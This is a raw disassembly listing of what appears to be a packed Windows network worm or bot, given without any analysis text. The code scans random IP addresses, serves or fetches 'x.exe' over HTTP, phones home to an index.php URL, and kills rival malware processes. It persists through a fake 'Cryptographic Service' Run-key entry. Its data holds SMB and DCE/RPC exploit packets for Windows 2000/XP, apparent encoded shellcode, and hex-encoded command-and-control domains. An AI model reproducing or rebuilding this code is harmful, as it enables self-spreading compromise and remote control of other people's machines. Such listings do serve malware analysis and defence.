loc_3143280C: ; CODE XREF: sub_3143278A+Cj pop ebp retn 4 sub_3143278A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432810 proc near ; DATA XREF: UPX0:314329E2o var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ecx call sub_314320B6 call sub_31432559 test eax, eax jnz loc_314328C9 push ebx mov ebx, dword_3143109C push esi mov esi, dword_314310FC push edi loc_31432836: ; CODE XREF: sub_31432810+48j ; sub_31432810+B0j call esi ; rand mov byte ptr [ebp+var_4+1], al call esi ; rand mov byte ptr [ebp+var_4+3], al call esi ; rand mov byte ptr [ebp+var_4+2], al loc_31432845: ; CODE XREF: sub_31432810+3Cj call esi ; rand cmp al, 7Fh mov byte ptr [ebp+var_4], al jz short loc_31432845 call sub_314321B4 mov edi, [ebp+var_4] cmp edi, eax jz short loc_31432836 call sub_314321F3 test eax, eax jz short loc_314328A1 push offset dword_31435044 call dword_314310D8 ; InterlockedIncrement push edi call sub_314319BC test eax, eax pop ecx jnz short loc_314328A8 push edi push offset sub_31432728 call sub_3143210D pop ecx mov [ebp+var_8], 4 pop ecx loc_3143288D: ; CODE XREF: sub_31432810+8Dj push edi push offset sub_3143278A call sub_3143210D dec [ebp+var_8] pop ecx pop ecx jnz short loc_3143288D jmp short loc_314328A8 ; --------------------------------------------------------------------------- loc_314328A1: ; CODE XREF: sub_31432810+51j push 2710h call ebx ; Sleep loc_314328A8: ; CODE XREF: sub_31432810+67j ; sub_31432810+8Fj call esi ; rand mov ecx, dword_3143504C xor edx, edx div ecx add edx, ecx push edx call ebx ; Sleep call sub_31432559 test eax, eax jz loc_31432836 pop edi pop esi pop ebx loc_314328C9: ; CODE XREF: sub_31432810+11j push 0 call dword_314310D4 ; ExitThread xor eax, eax leave retn 4 sub_31432810 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314328D7 proc near ; CODE XREF: UPX0:314329A7p ; UPX0:loc_31432A0Dp var_50 = byte ptr -50h var_28 = byte ptr -28h push ebp mov ebp, esp sub esp, 50h push esi call sub_314321B4 push eax call dword_31431160 ; inet_ntoa mov esi, dword_31431068 push eax lea eax, [ebp+var_28] push eax call esi ; lstrcpyA push dword_3143503C lea eax, [ebp+var_28] push eax lea eax, [ebp+var_50] push offset aHttpSDX_exe ; "http://%s:%d/x.exe" push eax call dword_31431120 ; wsprintfA add esp, 10h lea eax, [ebp+var_50] push eax push offset word_314342E2 call esi ; lstrcpyA push offset byte_314342E0 call dword_31431088 ; lstrlenA mov byte_314342E0[eax], 0DFh pop esi leave retn sub_314328D7 endp ; --------------------------------------------------------------------------- loc_31432933: ; DATA XREF: sub_3143256D+174o push ecx push ecx push ebx push ebp push esi xor ebx, ebx push edi mov dword_31435044, ebx call sub_314321F3 mov esi, dword_3143109C mov edi, 1388h test eax, eax jnz short loc_31432961 loc_31432955: ; CODE XREF: UPX0:3143295Fj push edi call esi ; Sleep call sub_314321F3 test eax, eax jz short loc_31432955 loc_31432961: ; CODE XREF: UPX0:31432953j lea eax, [esp+14h] push ebx push eax call dword_31431134 ; InternetGetConnectedState test byte ptr [esp+14h], 2 push 50h mov dword_31435048, ebx pop ebp mov dword_3143504C, 96h jz short loc_314329A0 mov dword_31435048, 1 mov ebp, 15Eh mov dword_3143504C, 14h loc_314329A0: ; CODE XREF: UPX0:31432985j call sub_314321B4 mov ebx, eax call sub_314328D7 cmp ebx, 100007Fh jz short loc_314329C1 push ebx push offset sub_31432728 call sub_3143210D pop ecx pop ecx loc_314329C1: ; CODE XREF: UPX0:314329B2j mov dword ptr [esp+10h], 4 loc_314329C9: ; CODE XREF: UPX0:314329DAj push ebx push offset sub_3143278A call sub_3143210D dec dword ptr [esp+18h] pop ecx pop ecx jnz short loc_314329C9 test ebp, ebp jle short loc_314329F1 loc_314329E0: ; CODE XREF: UPX0:314329EFj push 0 push offset sub_31432810 call sub_3143210D pop ecx dec ebp pop ecx jnz short loc_314329E0 loc_314329F1: ; CODE XREF: UPX0:314329DEj ; UPX0:314329FDj ... call sub_314321F3 test eax, eax jz short loc_314329FF push edi call esi ; Sleep jmp short loc_314329F1 ; --------------------------------------------------------------------------- loc_314329FF: ; CODE XREF: UPX0:314329F8j ; UPX0:31432A0Bj call sub_314321F3 test eax, eax jnz short loc_31432A0D push edi call esi ; Sleep jmp short loc_314329FF ; --------------------------------------------------------------------------- loc_31432A0D: ; CODE XREF: UPX0:31432A06j call sub_314328D7 jmp short loc_314329F1 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432A14 proc near ; CODE XREF: sub_31432BAD+93p ; sub_31432D2E+11Ap arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp lea eax, [ebp+arg_4] push eax push 0F003Fh push 0 push [ebp+arg_4] push [ebp+arg_0] call dword_3143100C ; RegOpenKeyExA test eax, eax jnz short loc_31432A47 push [ebp+arg_8] push [ebp+arg_4] call dword_31431010 ; RegDeleteValueA push [ebp+arg_4] call dword_31431014 ; RegCloseKey loc_31432A47: ; CODE XREF: sub_31432A14+1Cj pop ebp retn sub_31432A14 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432A49 proc near ; CODE XREF: sub_3143141F+28Ep ; sub_3143237F+33p ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push ecx mov eax, [ebp+arg_10] push esi mov [ebp+var_4], eax lea eax, [ebp+arg_10] push eax xor esi, esi push 0F003Fh push esi push [ebp+arg_4] push [ebp+arg_0] call dword_3143100C ; RegOpenKeyExA test eax, eax jz short loc_31432A75 push 1 pop eax jmp short loc_31432A9F ; --------------------------------------------------------------------------- loc_31432A75: ; CODE XREF: sub_31432A49+25j lea eax, [ebp+var_4] push eax lea eax, [ebp+arg_4] push [ebp+arg_C] push eax push esi push [ebp+arg_8] push [ebp+arg_10] call dword_31431008 ; RegQueryValueExA test eax, eax jz short loc_31432A94 push 2 pop esi loc_31432A94: ; CODE XREF: sub_31432A49+46j push [ebp+arg_10] call dword_31431014 ; RegCloseKey mov eax, esi loc_31432A9F: ; CODE XREF: sub_31432A49+2Aj pop esi leave retn sub_31432A49 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432AA2 proc near ; CODE XREF: sub_3143141F+306p ; sub_31432C62+96p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push esi xor esi, esi lea eax, [ebp+arg_4] push esi push eax push esi push 0F003Fh push esi push esi push esi push [ebp+arg_4] push [ebp+arg_0] call dword_31431000 ; RegCreateKeyExA test eax, eax jz short loc_31432ACB push 1 pop eax jmp short loc_31432AF2 ; --------------------------------------------------------------------------- loc_31432ACB: ; CODE XREF: sub_31432AA2+22j push [ebp+arg_10] push [ebp+arg_C] push 1 push esi push [ebp+arg_8] push [ebp+arg_4] call dword_31431004 ; RegSetValueExA test eax, eax jz short loc_31432AE7 push 2 pop esi loc_31432AE7: ; CODE XREF: sub_31432AA2+40j push [ebp+arg_4] call dword_31431014 ; RegCloseKey mov eax, esi loc_31432AF2: ; CODE XREF: sub_31432AA2+27j pop esi pop ebp retn sub_31432AA2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432AF5 proc near ; CODE XREF: sub_31432BAD+9Fp var_128 = dword ptr -128h var_120 = dword ptr -120h var_104 = byte ptr -104h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 128h push ebx mov ebx, [ebp+arg_0] push esi push ebx call dword_31431088 ; lstrlenA mov esi, eax dec esi test esi, esi jle loc_31432BA9 loc_31432B15: ; CODE XREF: sub_31432AF5+27j cmp byte ptr [esi+ebx], 5Ch jz short loc_31432B1E dec esi jns short loc_31432B15 loc_31432B1E: ; CODE XREF: sub_31432AF5+24j push 0 push 2 call sub_31432EFC ; CreateToolhelp32Snapshot cmp eax, 0FFFFFFFFh mov [ebp+arg_0], eax jz short loc_31432BA9 push 128h lea eax, [ebp+var_128] push 0 push eax call sub_31432EA6 ; memset add esp, 0Ch lea eax, [ebp+var_128] mov [ebp+var_128], 128h push eax push [ebp+arg_0] call sub_31432EF6 ; Process32First test eax, eax jz short loc_31432BA9 lea esi, [esi+ebx+1] loc_31432B66: ; CODE XREF: sub_31432AF5+B2j lea eax, [ebp+var_104] push eax push esi call dword_31431104 ; strstr pop ecx test eax, eax pop ecx jz short loc_31432B96 push [ebp+var_120] push 0 push 1F0FFFh call dword_314310B4 ; OpenProcess push 0 push eax call dword_31431060 ; TerminateProcess loc_31432B96: ; CODE XREF: sub_31432AF5+83j lea eax, [ebp+var_128] push eax push [ebp+arg_0] call sub_31432EF0 ; Process32Next test eax, eax jnz short loc_31432B66 loc_31432BA9: ; CODE XREF: sub_31432AF5+1Aj ; sub_31432AF5+38j ... pop esi pop ebx leave retn sub_31432AF5 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432BAD proc near ; CODE XREF: UPX0:31432536p var_13C = byte ptr -13Ch var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 13Ch push ebx push esi lea eax, [ebp+var_34] push edi mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager" mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter" mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service" mov [ebp+var_28], offset aBotLoader ; "Bot Loader" mov [ebp+var_24], offset aSystray ; "SysTray" mov [ebp+var_20], offset aWinupdate ; "WinUpdate" mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service" mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe" mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service" mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13" mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update" mov [ebp+var_4], eax mov [ebp+var_8], 0Bh mov edi, offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... mov esi, 80000002h loc_31432C1D: ; CODE XREF: sub_31432BAD+AEj mov eax, [ebp+var_4] push 104h mov ebx, [eax] lea eax, [ebp+var_13C] push eax push ebx push edi push esi call sub_31432A49 add esp, 14h test eax, eax jnz short loc_31432C54 push ebx push edi push esi call sub_31432A14 lea eax, [ebp+var_13C] push eax call sub_31432AF5 add esp, 10h loc_31432C54: ; CODE XREF: sub_31432BAD+8Ej add [ebp+var_4], 4 dec [ebp+var_8] jnz short loc_31432C1D pop edi pop esi pop ebx leave retn sub_31432BAD endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432C62 proc near ; CODE XREF: sub_31432D2E+D1p ; sub_31432D2E+132p var_78 = byte ptr -78h var_14 = byte ptr -14h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 78h cmp [ebp+arg_0], 0 jz short loc_31432C77 push [ebp+arg_0] call dword_31431074 ; DeleteFileA loc_31432C77: ; CODE XREF: sub_31432C62+Aj lea eax, [ebp+var_78] push 63h push eax call dword_31431090 ; GetSystemDirectoryA test eax, eax jz locret_31432D2C push esi call dword_314310FC ; rand and eax, 3 add eax, 5 push eax lea eax, [ebp+var_14] push eax call sub_3143212E mov esi, dword_3143108C pop ecx pop ecx lea eax, [ebp+var_14] push offset dword_314341F0 push eax call esi ; lstrcatA lea eax, [ebp+var_78] push offset dword_314341F8 push eax call esi ; lstrcatA lea eax, [ebp+var_14] push eax lea eax, [ebp+var_78] push eax call esi ; lstrcatA lea eax, [ebp+var_78] push 0 push eax push [ebp+arg_4] call dword_31431050 ; CopyFileA lea eax, [ebp+var_78] push eax call dword_31431088 ; lstrlenA inc eax push eax lea eax, [ebp+var_78] push eax push offset aCryptographicS ; "Cryptographic Service" push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... push 80000002h call sub_31432AA2 add esp, 14h push dword_31435034 call dword_31431080 ; CloseHandle lea eax, [ebp+var_78] push 0 push eax call dword_31431054 ; WinExec push 1F4h call dword_3143109C ; Sleep push 0 call dword_314310E4 ; ExitProcess pop esi locret_31432D2C: ; CODE XREF: sub_31432C62+23j leave retn sub_31432C62 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432D2E proc near ; CODE XREF: UPX0:3143253Bp var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_20 = byte ptr -20h push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi lea eax, [ebp+var_84] push 63h push eax push 0 call dword_31431048 ; GetModuleFileNameA test eax, eax jz loc_31432E67 and dword_31435050, 0 lea eax, [ebp+var_20] push 1Dh push eax mov edi, offset aSoftwareMicr_1 ; "Software\\Microsoft\\Wireless" push offset aId ; "ID" mov esi, 80000002h push edi push esi call sub_31432A49 add esp, 14h test eax, eax jz short loc_31432DB4 call dword_314310FC ; rand push 0Ah mov ebx, offset aBbdenbucqfywfv ; "bbdenbucqfywfvz" cdq pop ecx idiv ecx add edx, ecx push edx push ebx call sub_3143212E pop ecx pop ecx push ebx call dword_31431088 ; lstrlenA inc eax push eax push ebx push offset aId ; "ID" push edi push esi call sub_31432AA2 add esp, 14h jmp short loc_31432DC3 ; --------------------------------------------------------------------------- loc_31432DB4: ; CODE XREF: sub_31432D2E+4Dj lea eax, [ebp+var_20] push eax push offset aBbdenbucqfywfv ; "bbdenbucqfywfvz" call dword_31431068 ; lstrcpyA loc_31432DC3: ; CODE XREF: sub_31432D2E+84j lea eax, [ebp+var_E8] push 63h push eax push offset aCryptographicS ; "Cryptographic Service" push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... push esi call sub_31432A49 add esp, 14h test eax, eax jz short loc_31432E09 push 2 push offset a1 ; "1" push offset aClient ; "Client" push edi push esi call sub_31432AA2 lea eax, [ebp+var_84] push eax push 0 call sub_31432C62 add esp, 1Ch jmp short loc_31432E67 ; --------------------------------------------------------------------------- loc_31432E09: ; CODE XREF: sub_31432D2E+B3j lea eax, [ebp+var_84] push eax lea eax, [ebp+var_E8] push eax call dword_3143104C ; lstrcmpiA test eax, eax jnz short loc_31432E52 lea eax, [ebp+var_20] push 1Dh mov ebx, offset aClient ; "Client" push eax push ebx push edi push esi call sub_31432A49 add esp, 14h test eax, eax jnz short loc_31432E67 push ebx push edi push esi mov dword_31435050, 1 call sub_31432A14 add esp, 0Ch jmp short loc_31432E67 ; --------------------------------------------------------------------------- loc_31432E52: ; CODE XREF: sub_31432D2E+F1j lea eax, [ebp+var_84] push eax lea eax, [ebp+var_E8] push eax call sub_31432C62 pop ecx pop ecx loc_31432E67: ; CODE XREF: sub_31432D2E+1Fj ; sub_31432D2E+D9j ... pop edi pop esi pop ebx leave retn sub_31432D2E endp ; =============== S U B R O U T I N E ======================================= sub_31432E6C proc near ; CODE XREF: sub_314311A0+CAp ; sub_31431782+11p ... arg_0 = dword ptr 4 push 4 push 1000h push [esp+8+arg_0] push 0 call dword_31431044 ; VirtualAlloc retn sub_31432E6C endp ; =============== S U B R O U T I N E ======================================= sub_31432E80 proc near ; CODE XREF: sub_314311A0+10Bp ; sub_31431782+C0p arg_0 = dword ptr 4 push 8000h push 0 push [esp+8+arg_0] call dword_31431040 ; VirtualFree retn sub_31432E80 endp ; --------------------------------------------------------------------------- align 10h loc_31432EA0: ; DATA XREF: sub_3143141F+Ao ; sub_3143256D+Ao jmp dword ptr loc_31431100 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EA6 proc near ; CODE XREF: sub_314319BC+128p ; sub_314319BC+134p ... jmp dword_314310F8 sub_31432EA6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EAC proc near ; CODE XREF: sub_314319BC+9Cp ; sub_314319BC+C5p ... jmp dword_314310F4 sub_31432EAC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EB2 proc near ; CODE XREF: sub_314319BC+93p ; sub_314319BC+B2p ... jmp dword_314310F0 sub_31432EB2 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_31432EC0 proc near ; CODE XREF: sub_314319BC+8p arg_0 = byte ptr 4 push ecx cmp eax, 1000h lea ecx, [esp+4+arg_0] jb short loc_31432EE0 loc_31432ECC: ; CODE XREF: sub_31432EC0+1Ej sub ecx, 1000h sub eax, 1000h test [ecx], eax cmp eax, 1000h jnb short loc_31432ECC loc_31432EE0: ; CODE XREF: sub_31432EC0+Aj sub ecx, eax mov eax, esp test [ecx], eax mov esp, ecx mov ecx, [eax] mov eax, [eax+4] push eax retn sub_31432EC0 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EF0 proc near ; CODE XREF: sub_31432AF5+ABp jmp dword_31431064 sub_31432EF0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EF6 proc near ; CODE XREF: sub_31432AF5+64p jmp dword_3143105C sub_31432EF6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EFC proc near ; CODE XREF: sub_31432AF5+2Dp jmp dword_31431058 sub_31432EFC endp ; --------------------------------------------------------------------------- db 2 dup(0CCh) dd 43Fh dup(0) dword_31434000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h ; DATA XREF: sub_3143141F+11Do ; sub_3143141F+20Fo dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h dd 3072657Ah, 0 aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_31431782+84o align 10h byte_31434080 db 0 ; DATA XREF: sub_3143185D+1Br off_31434081 dd offset dword_314341E4 ; DATA XREF: sub_3143185D+23r align 2 dd offset dword_314341D4 dw 0C401h dd 1314341h, 314341B4h, 4341A000h, 41900131h, 80013143h dd 314341h, 31434174h, 43416800h, 41580131h, 48003143h dd 1314341h, 3143413Ch, 43417400h, 41D40131h, 30003143h dd 314341h, 314341D4h, 43412001h, 41480031h, 10013143h dd 314341h, 31434130h, 43410001h, 40F80131h, 74003143h dd 314341h, 31434130h, 2E767663h, 7572h, 2E777777h, 6C646572h dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh dd 782D7265h, 6D6F632Eh, 0 dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0 dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh dd 75722E6Bh, 0 dword_314341D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314341E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314341F0 dd 6578652Eh, 0 ; sub_31432239+55o ... dword_314341F8 dd 5Ch ; sub_31432C62+56o aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_314311A0+13o align 10h aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31431313+1Co align 4 aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31431313+Co align 4 aD db '%d',0 ; DATA XREF: sub_3143141F+2CCo align 4 dword_3143426C dd 444952h aSoftwareMicros db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_3143141F+259o aZer1 db 'zer1',0 ; DATA XREF: sub_3143141F:loc_314315B7o align 4 aZer0 db 'zer0',0 ; DATA XREF: sub_3143141F+34o align 4 aHttpS db 'http://%s',0 ; DATA XREF: sub_31431782+71o align 4 aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=20&cnt=%s',0 ; DATA XREF: sub_31431782+57o align 10h byte_314342E0 db 0EBh ; DATA XREF: sub_314319BC+24Eo ; sub_314319BC+260o ... db 58h word_314342E2 dw 7468h ; DATA XREF: sub_314328D7+40o dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h) dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh dd 0 dword_314345A8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_314319BC+186o dd 0FEFF0000h, 0 dd 2006200h aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0 db 2 db 4Ch ; L db 41h, 4Eh, 4Dh db 41h ; A db 4Eh, 31h, 2Eh db 30h ; 0 align 2 dw 5702h aIndowsForWorkg db 'indows for Workgroups 3.1a',0 db 2 dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh dd 544E0200h, 204D4C20h, 32312E30h, 0 dword_31434634 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+1BAo dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0 dd 20000000h, 0 dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h dd 4 dup(0) aWindows2000219: unicode 0, <Windows 2000 2195>,0 aWindows20005_0: unicode 0, <Windows 2000 5.0>,0 align 10h dword_314346E0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+1EEo dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0 dd 57000000h, 0 dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h dd 0 dd 47000000h, 0 dd 40000000h, 0 dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h dd 2E0035h, 30h, 0 dword_314347C0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+8Do dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h dd 5C0030h, 500049h aC: ; DATA XREF: sub_314319BC+BFo unicode 0, <C$>,0 a????? db '?????',0 dd 0 dword_31434824 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+2D4o dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0 dd 2019Fh, 3 dup(0) dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h dd 0 dword_31434890 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+308o dd 4DC0800h, 500800h, 48000010h, 0 dd 4, 2 dup(0) dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h dd 5C0045h, 0 dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0 dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh dd 0 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0 dword_31434934 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+4EEo dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0) dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h dd 5C0045h, 0 dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0 dd 3ECh, 0 dword_314349B4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 138578h, 0E9A65BABh, 0 dword_31434A48 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+347o dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h dd 8FFFFFFh, 10B800h, 4010B800h, 0 dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h dd 0DADh, 0 dd 0DADh, 0 dword_31434AB4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+372o dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0) dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h dd 5C0045h, 0 dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0 dword_31434B28 dd 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 3 dup(0) dd 586E6957h, 72502050h, 6Fh, 9 dup(0) db 2 dup(0) dword_31434BE6 dd 1004600h dw 1 dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0) dword_31434C20 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0) ; DATA XREF: sub_314319BC+41Bo ; sub_314319BC+45Do dd 123C0000h, 751Ch, 0Eh dup(0) ; --------------------------------------------------------------------------- loc_31434C98: ; DATA XREF: sub_314319BC+44Ao jmp short loc_31434CA0 ; --------------------------------------------------------------------------- jmp short loc_31434CA2 ; --------------------------------------------------------------------------- align 10h loc_31434CA0: ; CODE XREF: UPX0:loc_31434C98j ; DATA XREF: 